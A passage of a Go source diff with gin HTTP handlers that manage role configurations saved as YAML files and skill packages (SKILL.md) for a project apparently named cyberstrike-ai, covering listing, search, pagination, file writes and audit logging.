c.JSON(http.StatusNotFound, gin.H{"error": "角色不存在"})
|
||||
return
|
||||
}
|
||||
|
||||
// 确保角色的name与key一致
|
||||
if role.Name == "" {
|
||||
role.Name = roleName
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"role": role,
|
||||
})
|
||||
}
|
||||
|
||||
// UpdateRole 更新角色
|
||||
func (h *RoleHandler) UpdateRole(c *gin.Context) {
|
||||
roleName := c.Param("name")
|
||||
if roleName == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "角色名称不能为空"})
|
||||
return
|
||||
}
|
||||
|
||||
var req config.RoleConfig
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "无效的请求参数: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
// 确保角色名称与请求中的name一致
|
||||
if req.Name == "" {
|
||||
req.Name = roleName
|
||||
}
|
||||
|
||||
// 初始化Roles map
|
||||
if h.config.Roles == nil {
|
||||
h.config.Roles = make(map[string]config.RoleConfig)
|
||||
}
|
||||
|
||||
// 删除所有与角色name相同但key不同的旧角色(避免重复)
|
||||
// 使用角色name作为key,确保唯一性
|
||||
finalKey := req.Name
|
||||
keysToDelete := make([]string, 0)
|
||||
for key := range h.config.Roles {
|
||||
// 如果key与最终的key不同,但name相同,则标记为删除
|
||||
if key != finalKey {
|
||||
role := h.config.Roles[key]
|
||||
// 确保角色的name字段正确设置
|
||||
if role.Name == "" {
|
||||
role.Name = key
|
||||
}
|
||||
if role.Name == req.Name {
|
||||
keysToDelete = append(keysToDelete, key)
|
||||
}
|
||||
}
|
||||
}
|
||||
// 删除旧的角色
|
||||
for _, key := range keysToDelete {
|
||||
delete(h.config.Roles, key)
|
||||
h.logger.Info("删除重复的角色", zap.String("oldKey", key), zap.String("name", req.Name))
|
||||
}
|
||||
|
||||
// 如果当前更新的key与最终key不同,也需要删除旧的
|
||||
if roleName != finalKey {
|
||||
delete(h.config.Roles, roleName)
|
||||
}
|
||||
|
||||
// 如果角色名称改变,需要删除旧文件
|
||||
if roleName != finalKey {
|
||||
configDir := filepath.Dir(h.configPath)
|
||||
rolesDir := h.config.RolesDir
|
||||
if rolesDir == "" {
|
||||
rolesDir = "roles" // 默认目录
|
||||
}
|
||||
|
||||
// 如果是相对路径,相对于配置文件所在目录
|
||||
if !filepath.IsAbs(rolesDir) {
|
||||
rolesDir = filepath.Join(configDir, rolesDir)
|
||||
}
|
||||
|
||||
// 删除旧的角色文件
|
||||
oldSafeFileName := sanitizeFileName(roleName)
|
||||
oldRoleFileYaml := filepath.Join(rolesDir, oldSafeFileName+".yaml")
|
||||
oldRoleFileYml := filepath.Join(rolesDir, oldSafeFileName+".yml")
|
||||
|
||||
if _, err := os.Stat(oldRoleFileYaml); err == nil {
|
||||
if err := os.Remove(oldRoleFileYaml); err != nil {
|
||||
h.logger.Warn("删除旧角色配置文件失败", zap.String("file", oldRoleFileYaml), zap.Error(err))
|
||||
}
|
||||
}
|
||||
if _, err := os.Stat(oldRoleFileYml); err == nil {
|
||||
if err := os.Remove(oldRoleFileYml); err != nil {
|
||||
h.logger.Warn("删除旧角色配置文件失败", zap.String("file", oldRoleFileYml), zap.Error(err))
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// 使用角色name作为key来保存(确保唯一性)
|
||||
h.config.Roles[finalKey] = req
|
||||
|
||||
// 保存配置到文件
|
||||
if err := h.saveConfig(); err != nil {
|
||||
h.logger.Error("保存配置失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "保存配置失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
h.logger.Info("更新角色", zap.String("oldKey", roleName), zap.String("newKey", finalKey), zap.String("name", req.Name))
|
||||
if h.audit != nil {
|
||||
h.audit.RecordOK(c, "role", "update", "更新角色", "role", finalKey, map[string]interface{}{"name": req.Name})
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"message": "角色已更新",
|
||||
"role": req,
|
||||
})
|
||||
}
|
||||
|
||||
// CreateRole 创建新角色
|
||||
func (h *RoleHandler) CreateRole(c *gin.Context) {
|
||||
var req config.RoleConfig
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "无效的请求参数: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
if req.Name == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "角色名称不能为空"})
|
||||
return
|
||||
}
|
||||
|
||||
// 初始化Roles map
|
||||
if h.config.Roles == nil {
|
||||
h.config.Roles = make(map[string]config.RoleConfig)
|
||||
}
|
||||
|
||||
// 检查角色是否已存在
|
||||
if _, exists := h.config.Roles[req.Name]; exists {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "角色已存在"})
|
||||
return
|
||||
}
|
||||
|
||||
// 创建角色(默认启用)
|
||||
if !req.Enabled {
|
||||
req.Enabled = true
|
||||
}
|
||||
|
||||
h.config.Roles[req.Name] = req
|
||||
|
||||
// 保存配置到文件
|
||||
if err := h.saveConfig(); err != nil {
|
||||
h.logger.Error("保存配置失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "保存配置失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
h.logger.Info("创建角色", zap.String("roleName", req.Name))
|
||||
if h.audit != nil {
|
||||
h.audit.RecordOK(c, "role", "create", "创建角色", "role", req.Name, nil)
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"message": "角色已创建",
|
||||
"role": req,
|
||||
})
|
||||
}
|
||||
|
||||
// DeleteRole 删除角色
|
||||
func (h *RoleHandler) DeleteRole(c *gin.Context) {
|
||||
roleName := c.Param("name")
|
||||
if roleName == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "角色名称不能为空"})
|
||||
return
|
||||
}
|
||||
|
||||
if h.config.Roles == nil {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "角色不存在"})
|
||||
return
|
||||
}
|
||||
|
||||
if _, exists := h.config.Roles[roleName]; !exists {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "角色不存在"})
|
||||
return
|
||||
}
|
||||
|
||||
// 不允许删除"默认"角色
|
||||
if roleName == "默认" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "不能删除默认角色"})
|
||||
return
|
||||
}
|
||||
|
||||
delete(h.config.Roles, roleName)
|
||||
|
||||
// 删除对应的角色文件
|
||||
configDir := filepath.Dir(h.configPath)
|
||||
rolesDir := h.config.RolesDir
|
||||
if rolesDir == "" {
|
||||
rolesDir = "roles" // 默认目录
|
||||
}
|
||||
|
||||
// 如果是相对路径,相对于配置文件所在目录
|
||||
if !filepath.IsAbs(rolesDir) {
|
||||
rolesDir = filepath.Join(configDir, rolesDir)
|
||||
}
|
||||
|
||||
// 尝试删除角色文件(.yaml 和 .yml)
|
||||
safeFileName := sanitizeFileName(roleName)
|
||||
roleFileYaml := filepath.Join(rolesDir, safeFileName+".yaml")
|
||||
roleFileYml := filepath.Join(rolesDir, safeFileName+".yml")
|
||||
|
||||
// 删除 .yaml 文件(如果存在)
|
||||
if _, err := os.Stat(roleFileYaml); err == nil {
|
||||
if err := os.Remove(roleFileYaml); err != nil {
|
||||
h.logger.Warn("删除角色配置文件失败", zap.String("file", roleFileYaml), zap.Error(err))
|
||||
} else {
|
||||
h.logger.Info("已删除角色配置文件", zap.String("file", roleFileYaml))
|
||||
}
|
||||
}
|
||||
|
||||
// 删除 .yml 文件(如果存在)
|
||||
if _, err := os.Stat(roleFileYml); err == nil {
|
||||
if err := os.Remove(roleFileYml); err != nil {
|
||||
h.logger.Warn("删除角色配置文件失败", zap.String("file", roleFileYml), zap.Error(err))
|
||||
} else {
|
||||
h.logger.Info("已删除角色配置文件", zap.String("file", roleFileYml))
|
||||
}
|
||||
}
|
||||
|
||||
h.logger.Info("删除角色", zap.String("roleName", roleName))
|
||||
if h.audit != nil {
|
||||
h.audit.RecordOK(c, "role", "delete", "删除角色", "role", roleName, nil)
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"message": "角色已删除",
|
||||
})
|
||||
}
|
||||
|
||||
// saveConfig 保存配置到目录中的文件
|
||||
func (h *RoleHandler) saveConfig() error {
|
||||
configDir := filepath.Dir(h.configPath)
|
||||
rolesDir := h.config.RolesDir
|
||||
if rolesDir == "" {
|
||||
rolesDir = "roles" // 默认目录
|
||||
}
|
||||
|
||||
// 如果是相对路径,相对于配置文件所在目录
|
||||
if !filepath.IsAbs(rolesDir) {
|
||||
rolesDir = filepath.Join(configDir, rolesDir)
|
||||
}
|
||||
|
||||
// 确保目录存在
|
||||
if err := os.MkdirAll(rolesDir, 0755); err != nil {
|
||||
return fmt.Errorf("创建角色目录失败: %w", err)
|
||||
}
|
||||
|
||||
// 保存每个角色到独立的文件
|
||||
if h.config.Roles != nil {
|
||||
for roleName, role := range h.config.Roles {
|
||||
// 确保角色名称正确设置
|
||||
if role.Name == "" {
|
||||
role.Name = roleName
|
||||
}
|
||||
|
||||
// 使用角色名称作为文件名(安全化文件名,避免特殊字符)
|
||||
safeFileName := sanitizeFileName(role.Name)
|
||||
roleFile := filepath.Join(rolesDir, safeFileName+".yaml")
|
||||
|
||||
// 将角色配置序列化为YAML
|
||||
roleData, err := yaml.Marshal(&role)
|
||||
if err != nil {
|
||||
h.logger.Error("序列化角色配置失败", zap.String("role", roleName), zap.Error(err))
|
||||
continue
|
||||
}
|
||||
|
||||
// 处理icon字段:确保包含\U的icon值被引号包围(YAML需要引号才能正确解析Unicode转义)
|
||||
roleDataStr := string(roleData)
|
||||
if role.Icon != "" && strings.HasPrefix(role.Icon, "\\U") {
|
||||
// 匹配 icon: \UXXXXXXXX 格式(没有引号),排除已经有引号的情况
|
||||
// 使用负向前瞻确保后面没有引号,或者直接匹配没有引号的情况
|
||||
re := regexp.MustCompile(`(?m)^(icon:\s+)(\\U[0-9A-F]{8})(\s*)$`)
|
||||
roleDataStr = re.ReplaceAllString(roleDataStr, `${1}"${2}"${3}`)
|
||||
roleData = []byte(roleDataStr)
|
||||
}
|
||||
|
||||
// 写入文件
|
||||
if err := os.WriteFile(roleFile, roleData, 0644); err != nil {
|
||||
h.logger.Error("保存角色配置文件失败", zap.String("role", roleName), zap.String("file", roleFile), zap.Error(err))
|
||||
continue
|
||||
}
|
||||
|
||||
h.logger.Info("角色配置已保存到文件", zap.String("role", roleName), zap.String("file", roleFile))
|
||||
}
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// sanitizeFileName 将角色名称转换为安全的文件名
|
||||
func sanitizeFileName(name string) string {
|
||||
// 替换可能不安全的字符
|
||||
replacer := map[rune]string{
|
||||
'/': "_",
|
||||
'\\': "_",
|
||||
':': "_",
|
||||
'*': "_",
|
||||
'?': "_",
|
||||
'"': "_",
|
||||
'<': "_",
|
||||
'>': "_",
|
||||
'|': "_",
|
||||
' ': "_",
|
||||
}
|
||||
|
||||
var result []rune
|
||||
for _, r := range name {
|
||||
if replacement, ok := replacer[r]; ok {
|
||||
result = append(result, []rune(replacement)...)
|
||||
} else {
|
||||
result = append(result, r)
|
||||
}
|
||||
}
|
||||
|
||||
fileName := string(result)
|
||||
// 如果文件名为空,使用默认名称
|
||||
if fileName == "" {
|
||||
fileName = "role"
|
||||
}
|
||||
|
||||
return fileName
|
||||
}
|
||||
|
||||
// updateRolesConfig 更新角色配置
|
||||
func updateRolesConfig(doc *yaml.Node, cfg config.RolesConfig) {
|
||||
root := doc.Content[0]
|
||||
rolesNode := ensureMap(root, "roles")
|
||||
|
||||
// 清空现有角色
|
||||
if rolesNode.Kind == yaml.MappingNode {
|
||||
rolesNode.Content = nil
|
||||
}
|
||||
|
||||
// 添加新角色(使用name作为key,确保唯一性)
|
||||
if cfg.Roles != nil {
|
||||
// 先建立一个以name为key的map,去重(保留最后一个)
|
||||
rolesByName := make(map[string]config.RoleConfig)
|
||||
for roleKey, role := range cfg.Roles {
|
||||
// 确保角色的name字段正确设置
|
||||
if role.Name == "" {
|
||||
role.Name = roleKey
|
||||
}
|
||||
// 使用name作为最终key,如果有多个key对应相同的name,只保留最后一个
|
||||
rolesByName[role.Name] = role
|
||||
}
|
||||
|
||||
// 将去重后的角色写入YAML
|
||||
for roleName, role := range rolesByName {
|
||||
roleNode := ensureMap(rolesNode, roleName)
|
||||
setStringInMap(roleNode, "name", role.Name)
|
||||
setStringInMap(roleNode, "description", role.Description)
|
||||
setStringInMap(roleNode, "user_prompt", role.UserPrompt)
|
||||
if role.Icon != "" {
|
||||
setStringInMap(roleNode, "icon", role.Icon)
|
||||
}
|
||||
setBoolInMap(roleNode, "enabled", role.Enabled)
|
||||
|
||||
// 添加工具列表(优先使用tools字段)
|
||||
if len(role.Tools) > 0 {
|
||||
toolsNode := ensureArray(roleNode, "tools")
|
||||
toolsNode.Content = nil
|
||||
for _, toolKey := range role.Tools {
|
||||
toolNode := &yaml.Node{Kind: yaml.ScalarNode, Tag: "!!str", Value: toolKey}
|
||||
toolsNode.Content = append(toolsNode.Content, toolNode)
|
||||
}
|
||||
} else if len(role.MCPs) > 0 {
|
||||
// 向后兼容:如果没有tools但有mcps,保存mcps
|
||||
mcpsNode := ensureArray(roleNode, "mcps")
|
||||
mcpsNode.Content = nil
|
||||
for _, mcpName := range role.MCPs {
|
||||
mcpNode := &yaml.Node{Kind: yaml.ScalarNode, Tag: "!!str", Value: mcpName}
|
||||
mcpsNode.Content = append(mcpsNode.Content, mcpNode)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// ensureArray 确保数组中存在指定key的数组节点
|
||||
func ensureArray(parent *yaml.Node, key string) *yaml.Node {
|
||||
_, valueNode := ensureKeyValue(parent, key)
|
||||
if valueNode.Kind != yaml.SequenceNode {
|
||||
valueNode.Kind = yaml.SequenceNode
|
||||
valueNode.Tag = "!!seq"
|
||||
valueNode.Content = nil
|
||||
}
|
||||
return valueNode
|
||||
}
|
||||
@@ -0,0 +1,710 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"net/http"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"regexp"
|
||||
"strings"
|
||||
|
||||
"cyberstrike-ai/internal/audit"
|
||||
"cyberstrike-ai/internal/config"
|
||||
"cyberstrike-ai/internal/database"
|
||||
"cyberstrike-ai/internal/skillpackage"
|
||||
|
||||
"github.com/gin-gonic/gin"
|
||||
"go.uber.org/zap"
|
||||
"gopkg.in/yaml.v3"
|
||||
)
|
||||
|
||||
// SkillsHandler Skills处理器(磁盘 + Eino 规范;运行时由 Eino ADK skill 中间件加载)
|
||||
type SkillsHandler struct {
|
||||
config *config.Config
|
||||
configPath string
|
||||
logger *zap.Logger
|
||||
db *database.DB // 数据库连接(遗留统计;MCP list/read 已移除)
|
||||
audit *audit.Service
|
||||
}
|
||||
|
||||
// SetAudit wires platform audit logging.
|
||||
func (h *SkillsHandler) SetAudit(s *audit.Service) {
|
||||
h.audit = s
|
||||
}
|
||||
|
||||
// NewSkillsHandler 创建新的Skills处理器
|
||||
func NewSkillsHandler(cfg *config.Config, configPath string, logger *zap.Logger) *SkillsHandler {
|
||||
return &SkillsHandler{
|
||||
config: cfg,
|
||||
configPath: configPath,
|
||||
logger: logger,
|
||||
}
|
||||
}
|
||||
|
||||
func (h *SkillsHandler) skillsRootAbs() string {
|
||||
skillsDir := h.config.SkillsDir
|
||||
if skillsDir == "" {
|
||||
skillsDir = "skills"
|
||||
}
|
||||
configDir := filepath.Dir(h.configPath)
|
||||
if !filepath.IsAbs(skillsDir) {
|
||||
skillsDir = filepath.Join(configDir, skillsDir)
|
||||
}
|
||||
return skillsDir
|
||||
}
|
||||
|
||||
// SetDB 设置数据库连接(用于获取调用统计)
|
||||
func (h *SkillsHandler) SetDB(db *database.DB) {
|
||||
h.db = db
|
||||
}
|
||||
|
||||
// GetSkills 获取所有skills列表(支持分页和搜索)
|
||||
func (h *SkillsHandler) GetSkills(c *gin.Context) {
|
||||
allSummaries, err := skillpackage.ListSkillSummaries(h.skillsRootAbs())
|
||||
if err != nil {
|
||||
h.logger.Error("获取skills列表失败", zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
searchKeyword := strings.TrimSpace(c.Query("search"))
|
||||
|
||||
allSkillsInfo := make([]map[string]interface{}, 0, len(allSummaries))
|
||||
for _, s := range allSummaries {
|
||||
skillInfo := map[string]interface{}{
|
||||
"id": s.ID,
|
||||
"name": s.Name,
|
||||
"dir_name": s.DirName,
|
||||
"description": s.Description,
|
||||
"version": s.Version,
|
||||
"path": s.Path,
|
||||
"tags": s.Tags,
|
||||
"triggers": s.Triggers,
|
||||
"script_count": s.ScriptCount,
|
||||
"file_count": s.FileCount,
|
||||
"progressive": s.Progressive,
|
||||
"file_size": s.FileSize,
|
||||
"mod_time": s.ModTime,
|
||||
}
|
||||
allSkillsInfo = append(allSkillsInfo, skillInfo)
|
||||
}
|
||||
|
||||
filteredSkillsInfo := allSkillsInfo
|
||||
if searchKeyword != "" {
|
||||
keywordLower := strings.ToLower(searchKeyword)
|
||||
filteredSkillsInfo = make([]map[string]interface{}, 0)
|
||||
for _, skillInfo := range allSkillsInfo {
|
||||
id := strings.ToLower(fmt.Sprintf("%v", skillInfo["id"]))
|
||||
name := strings.ToLower(fmt.Sprintf("%v", skillInfo["name"]))
|
||||
description := strings.ToLower(fmt.Sprintf("%v", skillInfo["description"]))
|
||||
path := strings.ToLower(fmt.Sprintf("%v", skillInfo["path"]))
|
||||
version := strings.ToLower(fmt.Sprintf("%v", skillInfo["version"]))
|
||||
tagsJoined := ""
|
||||
if tags, ok := skillInfo["tags"].([]string); ok {
|
||||
tagsJoined = strings.ToLower(strings.Join(tags, " "))
|
||||
}
|
||||
trigJoined := ""
|
||||
if tr, ok := skillInfo["triggers"].([]string); ok {
|
||||
trigJoined = strings.ToLower(strings.Join(tr, " "))
|
||||
}
|
||||
if strings.Contains(id, keywordLower) ||
|
||||
strings.Contains(name, keywordLower) ||
|
||||
strings.Contains(description, keywordLower) ||
|
||||
strings.Contains(path, keywordLower) ||
|
||||
strings.Contains(version, keywordLower) ||
|
||||
strings.Contains(tagsJoined, keywordLower) ||
|
||||
strings.Contains(trigJoined, keywordLower) {
|
||||
filteredSkillsInfo = append(filteredSkillsInfo, skillInfo)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// 分页参数
|
||||
limit := 20 // 默认每页20条
|
||||
offset := 0
|
||||
if limitStr := c.Query("limit"); limitStr != "" {
|
||||
if parsed, err := parseInt(limitStr); err == nil && parsed > 0 {
|
||||
// 允许更大的limit用于搜索场景,但设置一个合理的上限(10000)
|
||||
if parsed <= 10000 {
|
||||
limit = parsed
|
||||
} else {
|
||||
limit = 10000
|
||||
}
|
||||
}
|
||||
}
|
||||
if offsetStr := c.Query("offset"); offsetStr != "" {
|
||||
if parsed, err := parseInt(offsetStr); err == nil && parsed >= 0 {
|
||||
offset = parsed
|
||||
}
|
||||
}
|
||||
|
||||
// 计算分页范围
|
||||
total := len(filteredSkillsInfo)
|
||||
start := offset
|
||||
end := offset + limit
|
||||
if start > total {
|
||||
start = total
|
||||
}
|
||||
if end > total {
|
||||
end = total
|
||||
}
|
||||
|
||||
// 获取当前页的skill列表
|
||||
var paginatedSkillsInfo []map[string]interface{}
|
||||
if start < end {
|
||||
paginatedSkillsInfo = filteredSkillsInfo[start:end]
|
||||
} else {
|
||||
paginatedSkillsInfo = []map[string]interface{}{}
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"skills": paginatedSkillsInfo,
|
||||
"total": total,
|
||||
"limit": limit,
|
||||
"offset": offset,
|
||||
})
|
||||
}
|
||||
|
||||
// GetSkill 获取单个skill的详细信息
|
||||
func (h *SkillsHandler) GetSkill(c *gin.Context) {
|
||||
skillName := c.Param("name")
|
||||
if skillName == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "skill名称不能为空"})
|
||||
return
|
||||
}
|
||||
|
||||
resPath := strings.TrimSpace(c.Query("resource_path"))
|
||||
if resPath == "" {
|
||||
resPath = strings.TrimSpace(c.Query("skill_script_path"))
|
||||
}
|
||||
if resPath != "" {
|
||||
content, err := skillpackage.ReadScriptText(h.skillsRootAbs(), skillName, resPath, 0)
|
||||
if err != nil {
|
||||
h.logger.Warn("读取skill资源失败", zap.String("skill", skillName), zap.String("path", resPath), zap.Error(err))
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"skill": map[string]interface{}{
|
||||
"id": skillName,
|
||||
},
|
||||
"resource": map[string]interface{}{
|
||||
"path": resPath,
|
||||
"content": content,
|
||||
},
|
||||
})
|
||||
return
|
||||
}
|
||||
|
||||
depthStr := strings.ToLower(strings.TrimSpace(c.DefaultQuery("depth", "full")))
|
||||
section := strings.TrimSpace(c.Query("section"))
|
||||
opt := skillpackage.LoadOptions{Section: section}
|
||||
switch depthStr {
|
||||
case "summary":
|
||||
opt.Depth = "summary"
|
||||
case "full", "":
|
||||
opt.Depth = "full"
|
||||
default:
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "depth 仅支持 summary 或 full"})
|
||||
return
|
||||
}
|
||||
|
||||
skill, err := skillpackage.LoadSkill(h.skillsRootAbs(), skillName, opt)
|
||||
if err != nil {
|
||||
h.logger.Warn("加载skill失败", zap.String("skill", skillName), zap.Error(err))
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "skill不存在: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
skillPath := skill.Path
|
||||
skillFile := filepath.Join(skillPath, "SKILL.md")
|
||||
|
||||
fileInfo, _ := os.Stat(skillFile)
|
||||
var fileSize int64
|
||||
var modTime string
|
||||
if fileInfo != nil {
|
||||
fileSize = fileInfo.Size()
|
||||
modTime = fileInfo.ModTime().Format("2006-01-02 15:04:05")
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"skill": map[string]interface{}{
|
||||
"id": skill.DirName,
|
||||
"name": skill.Name,
|
||||
"description": skill.Description,
|
||||
"content": skill.Content,
|
||||
"path": skill.Path,
|
||||
"version": skill.Version,
|
||||
"tags": skill.Tags,
|
||||
"scripts": skill.Scripts,
|
||||
"sections": skill.Sections,
|
||||
"package_files": skill.PackageFiles,
|
||||
"file_size": fileSize,
|
||||
"mod_time": modTime,
|
||||
"depth": depthStr,
|
||||
"section": section,
|
||||
},
|
||||
})
|
||||
}
|
||||
|
||||
// ListSkillPackageFiles lists all files in a skill directory (Agent Skills layout).
|
||||
func (h *SkillsHandler) ListSkillPackageFiles(c *gin.Context) {
|
||||
skillID := c.Param("name")
|
||||
files, err := skillpackage.ListPackageFiles(h.skillsRootAbs(), skillID)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"files": files})
|
||||
}
|
||||
|
||||
// GetSkillPackageFile returns one file by relative path (?path=).
|
||||
func (h *SkillsHandler) GetSkillPackageFile(c *gin.Context) {
|
||||
skillID := c.Param("name")
|
||||
rel := strings.TrimSpace(c.Query("path"))
|
||||
if rel == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "query path is required"})
|
||||
return
|
||||
}
|
||||
b, err := skillpackage.ReadPackageFile(h.skillsRootAbs(), skillID, rel, 0)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"path": rel, "content": string(b)})
|
||||
}
|
||||
|
||||
// PutSkillPackageFile writes a file inside the skill package.
|
||||
func (h *SkillsHandler) PutSkillPackageFile(c *gin.Context) {
|
||||
skillID := c.Param("name")
|
||||
var req struct {
|
||||
Path string `json:"path" binding:"required"`
|
||||
Content string `json:"content"`
|
||||
}
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "无效的请求参数: " + err.Error()})
|
||||
return
|
||||
}
|
||||
if req.Path == "SKILL.md" {
|
||||
if err := skillpackage.ValidateSkillMDPackage([]byte(req.Content), skillID); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
}
|
||||
if err := skillpackage.WritePackageFile(h.skillsRootAbs(), skillID, req.Path, []byte(req.Content)); err != nil {
|
||||
h.logger.Error("写入 skill 文件失败", zap.String("skill", skillID), zap.String("path", req.Path), zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"message": "saved", "path": req.Path})
|
||||
}
|
||||
|
||||
// GetSkillBoundRoles 获取绑定指定skill的角色列表
|
||||
func (h *SkillsHandler) GetSkillBoundRoles(c *gin.Context) {
|
||||
skillName := c.Param("name")
|
||||
if skillName == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "skill名称不能为空"})
|
||||
return
|
||||
}
|
||||
|
||||
boundRoles := h.getRolesBoundToSkill(skillName)
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"skill": skillName,
|
||||
"bound_roles": boundRoles,
|
||||
"bound_count": len(boundRoles),
|
||||
})
|
||||
}
|
||||
|
||||
// getRolesBoundToSkill 预留:角色不再配置 skill 绑定,始终返回空列表。
|
||||
func (h *SkillsHandler) getRolesBoundToSkill(skillName string) []string {
|
||||
_ = skillName
|
||||
return nil
|
||||
}
|
||||
|
||||
// CreateSkill 创建新 skill(标准 Agent Skills:生成 SKILL.md + YAML front matter)
|
||||
func (h *SkillsHandler) CreateSkill(c *gin.Context) {
|
||||
var req struct {
|
||||
Name string `json:"name" binding:"required"`
|
||||
Description string `json:"description" binding:"required"`
|
||||
Content string `json:"content" binding:"required"`
|
||||
}
|
||||
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "无效的请求参数: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
if !isValidSkillName(req.Name) {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "skill 目录名须为小写字母、数字、连字符(与 Agent Skills name 一致)"})
|
||||
return
|
||||
}
|
||||
|
||||
manifest := &skillpackage.SkillManifest{
|
||||
Name: req.Name,
|
||||
Description: strings.TrimSpace(req.Description),
|
||||
}
|
||||
skillMD, err := skillpackage.BuildSkillMD(manifest, req.Content)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if err := skillpackage.ValidateSkillMDPackage(skillMD, req.Name); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
skillDir := filepath.Join(h.skillsRootAbs(), req.Name)
|
||||
if err := os.MkdirAll(skillDir, 0755); err != nil {
|
||||
h.logger.Error("创建skill目录失败", zap.String("skill", req.Name), zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "创建skill目录失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
if _, err := os.Stat(filepath.Join(skillDir, "SKILL.md")); err == nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "skill已存在"})
|
||||
return
|
||||
}
|
||||
|
||||
if err := os.WriteFile(filepath.Join(skillDir, "SKILL.md"), skillMD, 0644); err != nil {
|
||||
h.logger.Error("创建 SKILL.md 失败", zap.String("skill", req.Name), zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "创建 SKILL.md 失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
h.logger.Info("创建skill成功", zap.String("skill", req.Name))
|
||||
if h.audit != nil {
|
||||
h.audit.RecordOK(c, "skill", "create", "创建 Skill", "skill", req.Name, nil)
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"message": "skill已创建",
|
||||
"skill": map[string]interface{}{
|
||||
"name": req.Name,
|
||||
"path": skillDir,
|
||||
},
|
||||
})
|
||||
}
|
||||
|
||||
// UpdateSkill 更新 SKILL.md(保留 front matter 中除 description 外的字段;可选覆盖 description)
|
||||
func (h *SkillsHandler) UpdateSkill(c *gin.Context) {
|
||||
skillName := c.Param("name")
|
||||
if skillName == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "skill名称不能为空"})
|
||||
return
|
||||
}
|
||||
|
||||
var req struct {
|
||||
Description string `json:"description"`
|
||||
Content string `json:"content" binding:"required"`
|
||||
}
|
||||
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "无效的请求参数: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
mdPath := filepath.Join(h.skillsRootAbs(), skillName, "SKILL.md")
|
||||
raw, err := os.ReadFile(mdPath)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "skill不存在: " + err.Error()})
|
||||
return
|
||||
}
|
||||
m, _, err := skillpackage.ParseSkillMD(raw)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if req.Description != "" {
|
||||
m.Description = strings.TrimSpace(req.Description)
|
||||
}
|
||||
